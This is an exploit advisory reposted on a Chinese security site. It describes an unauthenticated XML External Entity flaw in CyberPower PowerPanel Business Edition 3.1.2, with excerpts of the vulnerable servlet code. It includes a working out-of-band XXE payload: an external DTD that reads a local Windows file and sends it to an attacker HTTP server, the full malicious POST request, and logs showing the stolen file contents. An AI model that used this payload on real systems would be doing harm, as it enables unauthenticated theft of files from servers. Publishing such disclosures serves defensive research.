首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval 来源：http://www.zeroscience.mk 作者：LiquidWorm 发布时间：2016-07-11   CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval     Vendor: CyberPower Systems, Inc. Product web page: https://www.cyberpowersystems.com Affected version: 3.1.2 (37567) Business Edition   Summary: The PowerPanel® Business Edition software from CyberPower provides IT professionals with the tools they need to easily monitor and manage their backup power. Available for compatible CyberPower UPS models, this software supports up to 250 clients, allowing users remote access (from any network PC with a web browser) to instantly access vital UPS battery conditions, load levels, and runtime information. Functionality includes application/OS shutdown, event logging, hibernation mode, internal reports and analysis, remote management, and more.   Desc: PowerPanel suffers from an unauthenticated XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack. The vulnerability is triggered when input passed to the xmlservice servlet using the ppbe.xml script is not sanitized while parsing the xml inquiry payload returned by the JAXB element translation.   ================================================================   C:\Program Files (x86)\CyberPower PowerPanel Business Edition\ \web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\ ------------------------ XmlServiceServlet.class: ------------------------   94:  private InquirePayload splitInquirePayload(InputStream paramInputStream) 95:    throws RequestException 96:  { 97:    try 98:    { 99:      JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry"); 100:     Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller(); 101:     JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream); 102:     return (InquirePayload)localJAXBElement.getValue(); 103:   } 104:   catch (JAXBException localJAXBException) 105:   { 106:     localJAXBException.printStackTrace(); 107:     throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed."); 108:   } 109: }   ---   C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\ -------- web.xml: --------   28: <servlet> 29: <servlet-name>xmlService</servlet-name> 30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class> 31: <load-on-startup>3</load-on-startup> 32: </servlet> .. .. 60: <servlet-mapping> 61: <servlet-name>xmlService</servlet-name> 62: <url-pattern>/ppbe.xml</url-pattern> 63: </servlet-mapping>   ================================================================     Tested on: Microsoft Windows 7 Ultimate SP1 EN            Microsoft Windows 8            Microsoft Windows Server 2012            Linux (64bit)            MacOS X 10.6            Jetty(7.5.0.v20110901)            Java/1.8.0_91-b14            SimpleHTTP/0.6 Python/2.7.1     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                             @zeroscience     Advisory ID: ZSL-2016-5338 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php     22.06.2016   --     C:\data\xxe.xml: ----------------   <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini"> <!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">     Request: --------   POST /client/ppbe.xml HTTP/1.1 Host: localhost:3052 Content-Length: 258 User-Agent: XXETester/1.0 Connection: close   <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE zsl [ <!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml"> %remote; %root; %oob;]> <ppbe> <target> <command>action.notification.recipient.present</command> </target> <inquire /> </ppbe>       Response: ---------   C:\data>python -m SimpleHTTPServer 8011 Serving HTTP on 0.0.0.0 port 8011 ... lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 - lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 - lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·php Real Estate Script 3 - Arb ·Ruby On Rails ActionPack Inlin ·Microsoft WinDbg logviewer.exe ·MS16-016 mrxdav.sys WebDav Loc ·Microsoft Process Kill Utility ·Belkin Router AC1200 Firmware ·WordPress WP-DownloadManager P ·Tiki Wiki 15.1 - Unauthenticat ·GE Proficy HMI/SCADA CIMPLICIT ·Core FTP Le 2.2 Buffer Overflo ·Core FTP LE 2.2 - Path Field L ·Riverbed SteelCentral NetProfi   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved